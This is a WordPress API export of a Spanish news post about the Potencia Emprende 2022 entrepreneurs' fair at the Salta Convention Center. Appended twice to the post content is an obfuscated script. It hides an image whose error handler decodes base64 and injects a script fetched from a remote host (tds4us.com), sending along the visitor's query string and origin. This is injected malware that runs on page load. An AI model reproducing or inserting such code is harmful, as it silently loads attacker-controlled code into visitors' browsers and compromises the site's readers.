{"id":1505,"date":"2022-09-20T12:20:14","date_gmt":"2022-09-20T15:20:14","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1505"},"modified":"2025-08-14T00:35:01","modified_gmt":"2025-08-14T03:35:01","slug":"el-centro-de-convenciones-de-salta-se-consolida-como-sede-regional-de-eventos-y-reuniones","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1505","title":{"rendered":"El Centro de Convenciones de Salta se consolida como sede regional de eventos y reuniones"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#c40a39\"><em>La feria de emprendedores m\u00e1s grande del Noroeste Argentino, cont\u00f3 con la participaci\u00f3n de alrededor de mil emprendedores y 120 mil visitantes, con un gran despliegue en el predio de la sede de eventos.<\/em><\/h4>\n\n\n\n<p>Este fin de semana el Centro de Convenciones de Salta fue el escenario de Potencia Emprende 2022, la feria de emprendedores m\u00e1s grande del Noroeste Argentino. All\u00ed, alrededor de mil emprendedores de la provincia mostraron y ofrecieron sus productos en un formato de feria comercial al aire libre, dispuesto en 8 hect\u00e1reas del predio de esta sede de reuniones.<\/p>\n\n\n\n<p>El armado del evento const\u00f3 de 7 d\u00edas de montaje, donde trabajaron de manera conjunta organizadores y proveedores de servicios tales como carpas, t\u00e9cnica, art\u00edstica, catering, comunicaci\u00f3n y merchandising, entre otros. Adem\u00e1s, se coordin\u00f3 el trabajo con otras \u00e1reas del gobierno provincial y municipal para garantizar la organizaci\u00f3n y seguridad de los espacios.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/4149-el-centro-de-convenciones-de-salta-abrio-sus-puertas-a-potencia-emprende-2022-20220920110808.jpg\" alt=\"\" width=\"-687\" height=\"-458\"\/><\/figure><\/div>\n\n\n<p>Durante las dos jornadas, m\u00e1s de 120 mil visitantes disfrutaron de este encuentro que cont\u00f3 adem\u00e1s con tres patios de comida, 40 food trucks, un patio de cervezas y bebidas artesanales, espacios para juegos de ni\u00f1os y un gran escenario para espect\u00e1culos musicales con bandas en vivo.<\/p>\n\n\n\n<p>\u00abPotencia\u00bb tendr\u00e1 pr\u00f3ximas ediciones en el Centro de Convenciones de Salta para seguir creando oportunidades de visibilizaci\u00f3n para emprendedores, en un formato de evento comercial y recreativo para la oferta de actividades en Salta.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/4150-el-centro-de-convenciones-de-salta-abrio-sus-puertas-a-potencia-emprende-2022-20220920110819.JPG\" alt=\"\" width=\"312\" height=\"176\"\/><\/figure><\/div>\n\n\n<p>Con eventos de este nivel, teniendo como marco el trabajo que desarrolla el Ministerio de Turismo y Deportes de Salta y el sector privado de la industria de reuniones, el Centro de Convenciones de Salta se sigue consolidando como la sede de eventos m\u00e1s importantes de la regi\u00f3n, brindando experiencias \u00fanicas en un ambiente propicio para el \u00e9xito de cada encuentro.<\/p>\n\n\n\n<p>Fuente:&nbsp;<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-centro-de-convenciones-de-salta-se-consolida-como-sede-regional-de-eventos-y-reuniones-84966\" target=\"_blank\" rel=\"noreferrer noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La feria de emprendedores m\u00e1s grande del Noroeste Argentino, cont\u00f3 con la participaci\u00f3n de alrededor de mil emprendedores y 120 mil visitantes, con un gran despliegue en el predio de la sede de eventos. Este fin de semana el Centro de Convenciones de Salta fue el escenario de Potencia Emprende 2022, la feria de emprendedores [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1506,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16],"tags":[],"class_list":{"0":"post-1505","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1505"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1505"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1505\/revisions"}],"predecessor-version":[{"id":7344,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1505\/revisions\/7344"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1506"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1505"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1505"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1505"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}